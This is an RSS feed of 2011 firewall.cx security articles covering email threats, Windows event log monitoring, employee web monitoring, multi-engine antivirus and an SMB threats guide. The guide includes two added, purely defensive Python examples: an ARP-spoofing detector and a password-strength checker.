			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/email-security-threat.html</guid>
			<description><![CDATA[<p>This white paper explains why antivirus software alone is not enough to protect your organization against the current and future onslaught of computer viruses. Examining the different kinds of email threats and email attack methods, this paper describes the need for a solid server-based content-checking gateway to safeguard your business against email viruses and attacks as well as information leaks.</p>
<p>We apologize but this paper is no longer available. Back to the <a href="https://www.firewall.cx/tools-tips-reviews/security-articles.html" title="Security Articles">Security Articles</a> section.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 16 Jul 2011 09:25:30 +1000</pubDate>
		</item>
		<item>
			<title>Log-Based Intrusion-Detection and Analysis in Windows Servers</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/news-log-based-id-gfi.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/news-log-based-id-gfi.html</guid>
			<description><![CDATA[<h2 style="text-align: justify;">Introduction - How to Perform Network-Wide Security Event Log Management</h2>
<p style="text-align: justify;">Microsoft Windows machines have basic audit facilities but they fall short of fulfilling real-life business needs (i.e., monitoring Windows computers in real-time, periodically analyzing security activity, and maintaining a long-term audit trail). Therefore, the need exists for a log-based intrusion detection and analysis tool such as EventsManager.</p>
<p style="text-align: justify;">This paper explains how EventsManager’s innovative architecture can fill the gaps in Windows’ security log functionality – without hurting performance and while remaining cost-effective. It discusses the use of EventsManager to implement best practice and fulfill due diligence requirements imposed by auditors and regulatory agencies, and provides strategies for making maximum use of GFI EventsManager’s capabilities.</p>
<p class="box-hint" style="text-align: justify;">This white paper is no longer available by the vendor. To read similar interesting security articles, please visit our <a href="https://www.firewall.cx/tools-tips-reviews/security-articles.html" title="Security Articles section">Security Articles section</a>.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Tue, 12 Jul 2011 05:04:57 +1000</pubDate>
		</item>
		<item>
			<title>Web Monitoring for Employee Productivity Enhancement</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/web-monitoring-gfi.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/web-monitoring-gfi.html</guid>
			<description><![CDATA[<p style="text-align: justify;">All too often when web monitoring and Internet use restrictions are put into place it hurts company morale and does little to</p>
<p style="text-align: justify;">enhance employee productivity. Not wanting to create friction in the workplace many employers shy away from using what could be a significant employee productivity enhancement tool. Wasting time through Internet activities is simple and it’s a huge hidden cost to business. Just answering a few personal e-mails, checking the sports scores, reading the news headlines and checking to see how your bid is holding up can easily waste an hour of time each day. If the company has an 8 person CAD department and each of them spends an hour day on the above activities, that’s a whole employee wasted!</p>
<p style="text-align: justify;">Employees both want and don’t want to have their Internet use restricted. The key to success in gaining productivity and employee acceptance of the problem is the perception of fairness, clear goals and self enforcement.</p>
<h2 style="text-align: justify;">Why Employees Don’t Want Internet Blocking</h2>
<ol style="text-align: justify;">
<li>They don’t know what is blocked and what is allowed. This uncertainty creates fear that they may do “something” that could hurt their advancement opportunities or worse jeopardize their job.</li>
<li>Someone ruined it for everyone and that person still works here. When everyone is punished, no one is happy. Resentment builds against the employee known to have visited inappropriate websites.</li>
<li>There’s no procedure in place for allowing an employee access to a blocked website. When an employee finds that a website they tried to access is blocked, what do they do? Certainly this indiscretion is going to show up on a report somewhere. What if they really need that site? Is there a procedure in place for allowing this person to access it?</li>
</ol>
<p style="text-align: justify;">Uncertainty is fodder for loss of morale. In today’s economic climate employees are especially sensitive to any action that can be perceived as clamping down on them. Therefore a web monitoring program must be developed that can be viewed in a positive light by all employees.</p>
<h2 style="text-align: justify;">Why Employers are Afraid of Internet Blocking</h2>
<ul style="text-align: justify;">
<li>The potential of adding to IT costs and human resources headaches takes away the value from web monitoring. The Internet is a big place and employees are smart. Employers don’t want to get into a situation where they are simply chasing their tail, trading one productivity loss for incurred costs and frustration elsewhere.</li>
</ul>
<ul style="text-align: justify;">
<li>Employers want to allow employee freedom. There is general recognition by employers that a happy employee is a loyal productive employee. Allowing certain freedoms creates a more satisfying work environment. The impact of taking that away may cause good employees to leave and an increase in turn over can be costly.</li>
</ul>
<p>The fear of trading one cost for another or trading one headache for another has prevented many employers from implementing internet monitoring and blocking. A mistrust of IT services may also come into play. Technology got us into this situation, where up to 20% of employee time is spent on the Internet, and many employers don’t trust that technology can also help them gain that productivity back. A monitoring program needs to be simple to implement and maintain.</p>
<h2>Why Employees Want Internet Controls</h2>
<ul style="text-align: justify;">
<li>Employees are very aware of what their co-workers are doing or not doing. If an employee in the office spends an hour every day monitoring their auctions on eBay, or reading personal e-mail or chatting on IM, every other employee in the office knows it and resents it. If they are working hard, everyone else should be too.</li>
<li>Unfortunately pornographic and other offensive material finds its way into the office when the Internet is unrestricted. Exposure to this material puts the employee in a difficult situation. Do they tell the boss? Do they try to ignore it? Do they talk to the employee themselves? The employee would rather not be put into this situation.</li>
<li>Employees want to work for successful, growing companies. Solid corporate policies that are seen as a necessary means to continue to propel the company forward add to employee satisfaction. Web monitoring can be one of those policies.</li>
</ul>
<h2>How Employers can Gain Employee Support for Web Monitoring</h2>
<ul style="text-align: justify;">
<li>Provide a clear, fair policy statement and expose the reasoning and goals. Keep it simple. Employees won’t read a long policy position paper. Stick to the facts and use positive language.</li>
<li>Policies that make sense to staff are easy to enforce</li>
<li>Policies with goals are easy to measure</li>
<li>When the goal has been reached celebrate with your employees in a big way. Everyone likes to feel like part of the team.</li>
<li>Empower your employees. White list, don’t black list. Let each employee actively participate in deciding which sites are allowed and which aren’t for them. Let the employee tell you what they need to be most productive and then provide it, no questions asked.</li>
<li>Most job positions can be boiled down to between 5 and 20 websites. Employees know what they need. Ask them to provide a list.</li>
<li>Show employees the web monitoring reports. Let them see the before and after and let them see the on-going reports. This will encourage self monitoring. This is an enforcement tool in disguise. Employees know that management can view these reports too and will take care that they make them look good.</li>
<li>Send employees a weekly report on their Internet usage. They will look at it and act on it to make sure they are portrayed to management in the best light, and may even compare themselves against others.</li>
</ul>
<h2>Summary</h2>
<p style="text-align: justify;">Web monitoring is good for business. The Internet as a productivity tool has wide acceptance but recent changes have brought new distractions costing business some of those productivity gains. The Internet can be controlled but needs to be done in a way that allows for employee buy-in, self monitoring and self enforcement to be successful.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Mon, 11 Jul 2011 01:26:32 +1000</pubDate>
		</item>
		<item>
			<title>Security Threats: A Guide for Small &amp; Medium Businesses</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/security-threats-smb-guide.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/security-threats-smb-guide.html</guid>
			<description><![CDATA[<p style="text-align: justify;">A successful business works on the basis of revenue growth and loss prevention. Small and medium-sized businesses are particularly hit hard when either one or both of these business requirements suffer. Data leakage, down-time and reputation loss can easily turn away new and existing customers if such situations are not handled appropriately and quickly. This may, in turn, impact on the company’s bottom line and ultimately profit margins. A computer virus outbreak or a network breach can cost a business thousands of dollars. In some cases, it may even lead to legal liability and lawsuits.<br /><br />The truth is that many organizations would like to have a secure IT environment but very often this need comes into conflict with other priorities. Firms often find the task of keeping the business functions aligned with the security process highly challenging. When economic circumstances look dire, it is easy to turn security into a checklist item that keeps being pushed back. However the reality is that, in such situations, security should be a primary issue. The likelihood of threats affecting your business will probably increase and the impact can be more detrimental if it tarnishes your reputation.This paper aims to help small and medium-sized businesses focus on threats that are likely to have an impact on, and affect, the organization. <br /><br />These threats specifically target small and medium-sized business rather than enterprise companies or home users.<strong><strong><br /></strong></strong></p>
<h2>Security Threats That Affect SMBs - Malicious Internet Content</h2>
<p style="text-align: justify;">Most modern small or medium-sized businesses need an Internet connection to operate. If you remove this means of communication, many areas of the organization will not be able to function properly or else they may be forced to revert to old, inefficient systems. Just think how important email has become and that for many organizations this is the primary means of communication. Even phone communications are changing shape, with Voice over IP becoming a standard in many organizations. At some point, most organizations have been the victim of a computer virus attack.</p>
<p style="text-align: justify;">While many may have antivirus protection, it is not unusual for an organization of more than 10 employees to use email or the internet without any form of protection. Even large organizations are not spared. Recently, three hospitals in London had to shut down their entire network due to an infection by a variant of a worm called Mytob. Most of the time we do not hear of small or medium-sized businesses becoming victims of such infections because it is not in their interest to publicize these incidents. Many small or medium-sized business networks cannot afford to employ prevention mechanisms such as network segregation. These factors simply make it easier for a worm to spread throughout an organization.</p>
<p style="text-align: justify;">Malware is a term that includes computer viruses, worms, Trojans and any other kind of malicious software. Employees and end users within an organization may unknowingly introduce malware on the network when they run malicious executable code (EXE files). Sometimes they might receive an email with an attached worm or download spyware when visiting a malicious website. Alternatively, to get work done, employees may decide to install pirated software for which they do not have a license. This software tends to have more code than advertised and is a common method used by malware writers to infect end users’ computers. An organization that operates efficiently usually has established ways to share files and content across the organization. These methods can also be abused by worms to further infect computer systems on the network.</p>
<p style="text-align: justify;">Computer malware does not have to be introduced manually or consciously. Basic software packages installed on desktop computers such as Internet Explorer, Firefox, Adobe Acrobat Reader or Flash have their fair share of security vulnerabilities. These security weaknesses are actively exploited by malware writers to automatically infect victims’ computers. Such attacks are known as drive-by downloads because the user has no knowledge of malicious files being downloaded onto his or her computer. In 2007 Google issued an alert describing 450,000 web pages that can install malware without the user’s consent.</p>
<h2 style="text-align: justify;">Then You Get Social Engineering Attacks</h2>
<p style="text-align: justify;">This term refers to a set of techniques whereby attackers make the most of weaknesses in human nature rather than flaws within the technology. A phishing attack is a type of social engineering attack that is normally opportunistic and targets a subset of society. A phishing email message will typically look very familiar to the end users: it will make use of genuine logos and other visuals (from a well-known bank, for example) and will, for all intents and purposes, appear to be the genuine thing. When the end user follows the instructions in the email, he or she is directed to reveal sensitive or private information such as passwords, PIN codes and credit card numbers.</p>
<p style="text-align: justify;">Employees and desktop computers are not the only target in an organization. Most small or medium-sized companies need to make use of servers for email, customer relationship management and file sharing. These servers tend to hold critical information that can easily become a target of an attack. Additionally, the move towards web applications has introduced a large number of new security vulnerabilities that are actively exploited by attackers to gain access to these web applications. If these services are compromised there is a high risk that sensitive information can be leaked and used by cyber-criminals to commit fraud.</p>
<h2 style="text-align: justify;">Attacks on Physical Systems</h2>
<p style="text-align: justify;">Internet-borne attacks are not the only security issue that organizations face. Laptops and mobiles are entrusted with the most sensitive information about the organization. These devices, whether they are company property or personally owned, often contain company documents and are used to log on to the company network. More often than not, these mobile devices are also used during conferences and travel, thus running the risk of physical theft.</p>
<p style="text-align: justify;">The number of laptops and mobile devices stolen per year is ever on the increase. Attrition.org had over 400 articles in 2008 related to high profile data loss, many of which involved stolen laptops and missing disks. If it happens to major hospitals and governments that have established rules on handling such situations, why should it not happen to smaller businesses?</p>
<h2 style="text-align: justify;">Another Threat Affecting Physical Security is that of Unprotected Endpoints</h2>
<p style="text-align: justify;">USB ports and DVD drives can both be used to leak data and introduce malware on the network. A USB stick that is mainly used for work and may contain sensitive documents becomes a security risk if it is taken home and left lying around and other members of the family use it on their home PC. While the employee may understand the sensitive nature of the information stored on the USB stick, the rest of the family will probably not. They may copy files back and forth without considering the implications. This is typically a case of negligence but it can also be the work of a targeted attack, where internal employees can take large amounts of information out of the company.</p>
<p style="text-align: justify;">Small and medium-sized businesses may overlook the importance of securing the physical network and server room to prevent unauthorized persons from gaining access. Open network points and unprotected server rooms can allow disgruntled employees and visitors to connect to the network and launch attacks such as ARP spoofing to capture unencrypted network traffic and steal passwords and content.</p>
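<p style="text-align: justify;">The ARP spoofing attack mentioned above leaves a visible trace on the segment: the attacker's ARP replies announce an IP address (typically the gateway's) with a MAC address that differs from the one seen before, and a single MAC ends up claiming several IPs. The following is an added example, not part of the original paper, that checks a sequence of observed ARP replies for exactly those two indicators. The hosts, addresses and the capture itself are constructed so the code runs offline; on a real LAN the same function would be fed the sender fields of ARP replies taken from a packet capture.</p>

```python
"""ARP-spoofing indicators over a set of observed ARP replies.

Added example; it is not from the original paper. On a live network the same
logic would be fed ARP replies from a packet capture on the LAN segment; here a
constructed sequence of replies stands in for that capture so it runs offline.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    """The sender fields of one ARP reply ('is-at') seen on the wire."""
    sender_ip: str
    sender_mac: str


def detect_arp_spoofing(replies, gateway_ip=None):
    """Return a list of alert tuples.

    Two indicators are checked:
      ("ip_mac_change", ip, new_mac): an IP announced with a MAC different from
          the one(s) seen earlier, which is what a poisoned cache entry looks like;
      ("mac_claims_gateway", mac, ips): one MAC announcing the gateway's IP and
          at least one other IP, the pattern of a man-in-the-middle that claims
          to be the gateway towards the victim and the victim towards the gateway.
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    alerts = []
    for reply in replies:
        mac = reply.sender_mac.lower()
        seen = ip_to_macs[reply.sender_ip]
        if seen and mac not in seen:
            alerts.append(("ip_mac_change", reply.sender_ip, mac))
        seen.add(mac)
        mac_to_ips[mac].add(reply.sender_ip)
    if gateway_ip is not None:
        for mac, ips in mac_to_ips.items():
            if gateway_ip in ips and len(ips) > 1:
                alerts.append(("mac_claims_gateway", mac, tuple(sorted(ips))))
    return alerts


# Constructed capture: a gateway and a workstation answer normally, then a
# third host announces both of their IPs with its own MAC.
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "AA:BB:CC:00:00:01"),    # real gateway
    ArpReply("192.168.1.20", "AA:BB:CC:00:00:20"),   # real workstation
    ArpReply("192.168.1.1", "DE:AD:BE:EF:00:99"),    # attacker poisons the gateway entry
    ArpReply("192.168.1.20", "DE:AD:BE:EF:00:99"),   # attacker poisons the workstation entry
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, gateway_ip="192.168.1.1"):
        print(alert)
```

<p style="text-align: justify;">A legitimate change, such as a DHCP lease moving an IP to a new machine, also produces an "ip_mac_change" alert, so in practice the alert is cross-checked against the DHCP server's lease table before anyone is paged; the "mac_claims_gateway" indicator has far fewer benign explanations.</p>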
<h2 style="text-align: justify;">Authentication and Privilege Attacks</h2>
<p style="text-align: justify;">Passwords remain the number one vulnerability in many systems. It is not an easy task to have a secure system whereby people are required to choose a unique password that others cannot guess but is still easy for them to remember. Nowadays most people have at least five other passwords to remember, and the password used for company business should not be the same one used for webmail accounts, site memberships and so on. High profile intrusions such as the one on Twitter (the password was happiness) clearly show that passwords are often the most common and universal security weakness, and attacks exploiting this weakness do not require a lot of technical knowledge.</p>
<p style="text-align: justify;">Password policies can go a long way to mitigate the risk, but if the password policy is too strict people will find ways and means to get around it. They will write the password on sticky notes, share it with their colleagues or simply find a keyboard pattern (1q2w3e4r5t) that is easy to remember but also easy to guess. Most complex password policies can be easily rendered useless by non-technological means.</p>
<p style="text-align: justify;">In small and medium-sized businesses, systems administrators are often found to be doing the work of the network operators and project managers as well as security analysts. Therefore a disgruntled systems administrator will be a major security problem due to the amount of responsibility (and access rights) that he or she holds. With full access privileges, a systems administrator may plant a logic bomb, create backdoor accounts or leak sensitive company information that may greatly affect the stability and reputation of the organization. Additionally, in many cases the systems administrator is the person who sets the passwords for important services or servers. When he or she leaves the organization, these passwords may not be changed (especially if not documented), thus leaving a backdoor for the ex-employee.</p>
<p style="text-align: justify;">A startup company called JournalSpace was caught with no backups when their former system administrator decided to wipe out the main database. This proved to be disastrous for the company, which ended up asking users to retrieve their content from Google’s cache. The company’s management team may also have administrative privileges on their personal computers or laptops. The reasons vary but they may want to be able to install new software or simply to have more control of their machines. The problem with this scenario is that one compromised machine is all that an attacker needs to target an organization. The firm itself does not need to be specifically picked out but may simply become a victim of an attack aimed at a particular vulnerable software package.</p>
<p style="text-align: justify;">Even when user accounts on the network are supposed to have reduced privileges, there may be times when privilege creep occurs. For example, a manager that hands over an old project to another manager may retain the old privileges for years even after the handover! When his or her account is compromised, the intruder also gains access to the old project.</p>
<p style="text-align: justify;">Employees with mobile devices and laptop computers can pose a significant risk when they make use of unsecured wireless networks whilst attending a conference or during their stay at a hotel. In many cases, inadequate or no encryption is used and anyone ‘in between’ can view and modify the network traffic. This can be the start of an intrusion leading to compromised company accounts and networks.</p>
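<p style="text-align: justify;">The password discussion above makes a point worth seeing in code: a keyboard walk such as 1q2w3e4r5t satisfies the usual "eight characters, letters and digits" rule and is still one of the first things a guessing tool tries. The following is an added example, not taken from the original paper, showing a check that rejects keyboard walks by looking at the physical adjacency of the keys typed, and rejects known passwords such as the Twitter example (happiness) even when a digit is appended. The QWERTY row table and the tiny blocklist are assumptions standing in for a full layout table and a breached-password corpus.</p>

```python
"""Password checks beyond a character-class rule.

Added example, not from the original paper. It shows that '1q2w3e4r5t' passes
a typical 'at least 8 characters with letters and digits' policy while being a
keyboard walk, and how a policy can reject such walks and known-compromised
passwords (the paper's Twitter example, 'happiness'). The QWERTY layout and the
small blocklist below are assumptions standing in for a real layout table and a
breached-password corpus.
"""
import string

# Unshifted rows of a US QWERTY keyboard; the column index approximates the
# key's physical position, so vertical and diagonal neighbours differ by one.
KEYBOARD_ROWS = ["1234567890-=", "qwertyuiop[]", "asdfghjkl;'", "zxcvbnm,./"]
KEY_POS = {ch: (r, c) for r, row in enumerate(KEYBOARD_ROWS) for c, ch in enumerate(row)}

# Constructed blocklist; a deployment would load a breached-password list instead.
COMMON_PASSWORDS = {"password", "happiness", "123456", "qwerty", "letmein", "welcome"}


def longest_keyboard_walk(password):
    """Length of the longest run of consecutive characters that sit on
    adjacent keys (left/right, up/down or diagonal): 'qwerty' -> 6,
    '1q2w3e4r5t' -> 10, a random passphrase -> small."""
    if not password:
        return 0
    best = run = 1
    prev = None
    for ch in password.lower():
        pos = KEY_POS.get(ch)
        adjacent = (prev is not None and pos is not None
                    and max(abs(pos[0] - prev[0]), abs(pos[1] - prev[1])) == 1)
        run = run + 1 if adjacent else 1
        best = max(best, run)
        prev = pos
    return best


def meets_naive_policy(password):
    """The rule many organizations deploy: 8+ characters, a letter and a digit."""
    return (len(password) >= 8
            and any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password))


def evaluate_password(password, min_length=12, max_walk=4):
    """Return the list of reasons the password is rejected; empty means accepted."""
    reasons = []
    if len(password) < min_length:
        reasons.append("too_short")
    # Strip a trailing digit/punctuation suffix so 'happiness1' is still caught.
    base = password.lower().rstrip(string.digits + string.punctuation)
    if base in COMMON_PASSWORDS:
        reasons.append("common_password")
    if longest_keyboard_walk(password) > max_walk:
        reasons.append("keyboard_walk")
    return reasons


if __name__ == "__main__":
    for candidate in ("1q2w3e4r5t", "happiness1", "correct horse battery staple"):
        print(candidate, meets_naive_policy(candidate), evaluate_password(candidate))
```

<p style="text-align: justify;">The adjacency test is deliberately layout-aware rather than a list of known walks, because users vary the walk (zxcvbn, 1qaz2wsx, qazwsx) faster than any list is updated; the blocklist, by contrast, only works if it is kept current with real breach data.</p>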
<h2>Denial Of Service</h2>
<p style="text-align: justify;">In an attempt to minimize costs, or simply through negligence, most small and some medium-sized businesses have various single points of failure. Denial of service is an attack that prevents legitimate users from making use of a service and it can be very hard to prevent. The means to carry out a DoS attack and the motives may vary, but it typically leads to downtime and legitimate customers losing confidence in the organization, and it is not necessarily due to an Internet-borne incident.</p>
<p style="text-align: justify;">In 2008 many organizations in the Mediterranean Sea basin and in the Middle East suffered Internet downtime due to damage to the underwater Internet cables. Some of these organizations relied on a single Internet connection, and their business was driven by Internet communications. Having such a single point of failure proved to be very damaging for these organizations in terms of lost productivity and lost business. Reliability is a major concern for most businesses and their inability to address even one single point of failure can be costly.</p>
<p style="text-align: justify;">If an organization is not prepared for a security incident, it will probably not handle the situation appropriately. One question that needs to be asked is: if a virus outbreak does occur, who should handle the various steps that need to be taken to get the systems back in shape? If an organization is simply relying on the systems administrator to handle such incidents, then that organization is not acknowledging that such a situation is not simply technical in nature. It is important to be able to identify the entry point, to approach the persons concerned and to have policies in place to prevent future occurrences, apart from simply removing the virus from the network! If all these tasks are left to a systems administrator, who might have to do everything ad hoc, then that is a formula for lengthy downtime.</p>
<h2>Addressing Security Threats - An Anti-virus is not an Option</h2>
<p style="text-align: justify;">The volume of malware that can hit organizations today is enormous and the attack vectors are multiple. Viruses may spread through email, websites, USB sticks, and instant messenger programs to name but a few. If an organization does not have an anti-virus installed, the safety of the desktop computers will be at the mercy of the end user – and relying on the end user is not advisable or worth the risk.</p>
<p style="text-align: justify;">Protecting desktop workstations is only one recommended practice. Once virus code is present on a desktop computer, it becomes a race between the virus and the anti-virus. Most malware has functionality to disable your anti-virus software, firewalls and so on. Therefore you do not want the virus to get to your desktop computer in the first place! The solution is to deploy content filtering at the gateway.</p>
<p style="text-align: justify;">Anti-virus can be part of the content filtering strategy which can be installed at the email and web gateway. Email accounts are frequently spammed with malicious email attachments. These files often appear to come from legitimate contacts thus fooling the end user into running the malware code. Leaving the decision to the user whether or not to trust an attachment received by email is never a good idea.</p>
<p style="text-align: justify;">By blocking malware at the email gateway, you are greatly reducing the risk that end users may make a mistake and open an infected file. Similarly, scanning all incoming web (HTTP) traffic for malicious code addresses a major infection vector and is a requirement when running a secure network environment.</p>
<h2 style="text-align: justify;">Security Awareness</h2>
<p style="text-align: justify;">A large percentage of successful attacks do not necessarily exploit technical vulnerabilities. Instead they rely on social engineering and people’s willingness to trust others. There are two extremes: either employees in an organization totally mistrust each other to such an extent that the sharing of data or information is nil; or, at the other end of the scale, you have total trust between all employees.</p>
<p style="text-align: justify;">In organizations neither approach is desirable. There has to be an element of trust throughout an organization but checks and balances are just as important. Employees need to be given the opportunity to work and share data but they must also be aware of the security issues that arise as a result of their actions. This is why a security awareness program is so important. For example, malware often relies on victims to run an executable file to spread and infect a computer or network.</p>
<p style="text-align: justify;">Telling your employees not to open emails from unknown senders is not enough. They need to be told that in so doing they risk losing all their work, their passwords and other confidential details to third parties. They need to understand what behavior is acceptable when dealing with email and web content. Anything suspicious should be reported to someone who can handle security incidents. Having open communication across different departments makes for better information security, since many social engineering attacks abuse the communication breakdowns across departments.</p>
<p style="text-align: justify;">Additionally, it is important to keep in mind that a positive working environment where people are happy in their job is less susceptible to insider attacks than an oppressive workplace.</p>
<h2>Endpoint Security</h2>
<p style="text-align: justify;">A lot of information in an organization is not centralized. Even when there is a central system, information is often shared between different users, different devices and copied numerous times. In contrast with perimeter security, endpoint security is the concept that each device in an organization needs to be secured. It is recommended that sensitive information is encrypted on portable devices such as laptops. <br /><br />Additionally, removable storage such as DVD drives, floppy drives and USB ports may be blocked if they are considered to be a major threat vector for malware infections or data leakage. Securing endpoints on a network may require extensive planning and auditing. For example, policies can be applied that state that only certain computers (e.g. laptops) can connect to specific networks. It may also make sense to restrict usage of wireless (WiFi) access points.</p>
<h2>Policies</h2>
<p style="text-align: justify;">Policies are the basis of every information security program. It is useless taking security precautions or trying to manage a secure environment if there are no objectives or clearly defined rules. Policies clarify what is or is not allowed in an organization as well as define the procedures that apply in different situations. They should be clear and have the full backing of senior management. Finally they need to be communicated to the organization’s staff and enforced accordingly.<br /><br />There are various policies, some of which can be enforced through technology and others which have to be enforced through human resources. For example, password complexity policies can be enforced through Windows domain policies. On the other hand, a policy which ensures that company USB sticks are not taken home may need to be enforced through awareness and labeling. <br /><br />As with most security precautions, it is important that policies that affect security are driven by business objectives rather than gut feelings. If security policies are too strict, they will be bypassed, thus creating a false sense of security and possibly creating new attack vectors.</p>
<h2>Role Separation</h2>
<p style="text-align: justify;">Separation of duties, auditing and the principle of least privilege can go a long way in protecting an organization from having single points of failure and privilege creep. By employing separation of duties, the impact of a particular employee turning against the organization is greatly reduced. For example, a system administrator who is not allowed to make alterations to the database server directly, but has to ask the database administrator and document his actions, is a good use of separation of duties. <br /><br />A security analyst who receives a report when a network operator makes changes to the firewall access control lists is a good application of auditing. If a manager has no business need to install software on a regular basis, then his or her account should not be granted such privileges (power user on Windows). These concepts are very important and it all boils down to who is watching the watchers.</p>
<h2>Backup and Redundant Systems</h2>
<p style="text-align: justify;">Although less glamorous than other topics in Information Security, backups remain one of the most reliable solutions. Making use of backups can have a direct business benefit when things go wrong. Disasters do occur and an organization will come across situations when hardware fails or a user (intentionally or otherwise) deletes important data. <br /><br />A well-managed and tested backup system will get the business back up and running in very little time compared to other disaster recovery solutions. It is therefore important that backups are not only automated to avoid human error but also periodically tested. It is useless having a backup system if restoration does not function as advertised. Redundant systems allow a business to continue working even if a disaster occurs. <br /><br />Backup servers and alternative network connections can help to reduce downtime or at least provide a business with limited resources until all systems and data are restored.</p>
<h2>Keeping your Systems Patched</h2>
<p style="text-align: justify;">New advisories addressing security vulnerabilities in software are published on a daily basis. It is not an easy task to stay up-to-date with all the vulnerabilities that apply for software installed on the network, therefore many organizations make use of a patch management system to handle the task. It is important to note that patches and security updates are not only issued for Microsoft products but also for third party software. For example, although the web browser is running the latest updates, a desktop can still be compromised when visiting a website simply because it is running a vulnerable version of Adobe Flash. <br /><br />Additionally it may be important to assess the impact of a vulnerability before applying a patch, rather than applying patches religiously. It is also important to test security updates before applying them to a live system. The reason is that, from time to time, vendors issue patches that may conflict with other systems or that were not tested for your particular configuration. <br /><br />Additionally, security updates may sometimes result in temporary downtime, for<br /><br />exposure<br /><br />Simple systems are easier to manage and therefore any security issues that apply to such systems can be addressed with relative ease. However, complex systems and networks make it harder for a security analyst to assess their security status. For example, if an organization does not need to expose a large number of services on the Internet, the firewall configuration would be quite straightforward. However, the greater the company’s need to be visible – an online retailer, for example – the more complex the firewall configuration will be, leaving room for possible security holes that could be exploited by attackers to access internal network services.<br /><br />When servers and desktop computers have fewer software packages installed, they are easier to keep up-to-date and manage. This concept can work hand in hand with the principle of least privilege. By making use of fewer components, less software and fewer privileges, you reduce the attack surface while allowing security to be more focused on tackling real issues.</p>
<h2>Conclusion</h2>
<p>Security in small and medium-sized businesses is more than just preventing viruses and blocking spam. In 2009, cybercrime is expected to increase as criminals attempt to exploit weaknesses in systems and in people. This document aims to give managers, analysts, administrators and operators in small and medium-sized businesses a snapshot of the IT security threats facing their organization. Every organization is different but in many instances the threats are common to all. Security is a cost of doing business but those that prepare themselves well against possible threats will benefit the most in the long term.</p>
]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 09 Jul 2011 11:49:52 +1000</pubDate>
		</item>
		<item>
			<title>Web Security Software Dealing With Malware</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/web-security-malware.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/web-security-malware.html</guid>
			<description><![CDATA[<p style="text-align: justify;">It is widely acknowledged that any responsible modern-day organization will strive to protect its network against malware attacks. Each day brings on a spawning of increasingly sophisticated viruses, worms, spyware, Trojans, and all other kinds of malicious software which can ultimately lead to an organization's network being compromised or brought down. Private information can be inadvertently leaked, a company's network can crash; whatever the outcome, poor security strategies could equal disaster. Having a network that is connected to the Internet leaves you vulnerable to attack, but Internet access is an absolute necessity for most organizations, so the wise thing to do would be to have a decent web security package installed on your machines, preferably at the gateway.</p>
<p style="text-align: justify;">There are several antivirus engines on the market and each product has its own heuristics, and subsequently its own particular strengths and weaknesses. It's impossible to claim any one as the best overall at any given time. It can never be predicted which antivirus lab will be the quickest to release an update providing protection against the next virus outbreak; it is often one company on one occasion and another one the next.</p>
<p style="text-align: justify;">Web security can never be one hundred percent guaranteed at all times, but there are ways to significantly minimize the risks. It is good and usual practice to use an antivirus engine to help protect your network, but it would naturally be much better to use <em>several</em> of them at once. Why is this? If, hypothetically speaking, your organization uses product A, and a new virus breaks out, it might be Lab A or Lab B, or any other antivirus lab, which releases an update the fastest. So the logical conclusion would be that the more AV engines you make use of, the greater the likelihood of you nipping that attack in the bud.</p>
<p style="text-align: justify;">This is one of the ways in which web security software can give you better peace of mind. Files which are downloaded on any of your company's computers can each be scanned using several engines, rather than just one, which could significantly reduce the time it will take to obtain the latest virus signatures, therefore diminishing the risk to your site by each new attack.</p>
<p style="text-align: justify;">Another plus side of web security software is that multiple download control policies can be set according to the individual organization's security policies, which could be either user, group or IP-based, controlling the downloading of different file types such as JavaScript, MP3, MPEG, exe, and more by specific users/groups/IP addresses. Hazardous files like Trojan downloader programs very often appear disguised as harmless files in order to gain access to a system. A good web security solution will analyze and detect the real file types of HTTP/FTP file downloads, making sure that files which are downloaded contain no viruses or malware.</p>
<p style="text-align: justify;">The long and short of it is this: you want the best security possible for your network, but it's not within anyone's power to predict where the next patch will come from. Rather than playing Russian roulette by sticking to one AV engine, adopt a web security package that will enable you to use several of them.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 09 Jul 2011 11:44:30 +1000</pubDate>
		</item>
		<item>
			<title>The Web Security Strategy for Your Organization</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/web-security-strategy.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/web-security-strategy.html</guid>
			<description><![CDATA[<p style="text-align: justify;">In today's business world, internet usage has become a necessity for doing business. Unfortunately, a company's use of the internet comes with considerable risk to its network and business information.</p>
<p style="text-align: justify;">Web security threats include phishing attacks, malware, scareware, rootkits, keyloggers, viruses and spam. While many attacks occur when information is downloaded from a website, others are now possible through drive-by attacks where simply visiting a website can infect a computer. These attacks usually result in data and information leakage, loss in productivity, loss of network bandwidth and, depending on the circumstances, even liability issues for the company. In addition to all this, cleanup from malware and other types of attacks on a company's network are usually costly from both the dollar aspect as well as the time spent recovering from these web security threats.</p>
<p style="text-align: justify;">Fortunately, there are steps a company can take to protect itself from these web security threats. Some are more effective than others, but the following suggestions should help narrow down the choices.</p>
<h2 style="text-align: justify;">Employee Internet Usage Policy</h2>
<p style="text-align: justify;">The first and probably the least expensive solution would be to develop and implement an employee internet usage policy. This policy should clearly define what an employee can and cannot do when using the internet. It should also address personal usage of the internet on the business computer. The policy should identify the type of websites that can be accessed by the employee for business purposes and what, if any, type of material can be downloaded from the internet. Always make sure the information contained in the policy fits your unique business needs and environment.</p>
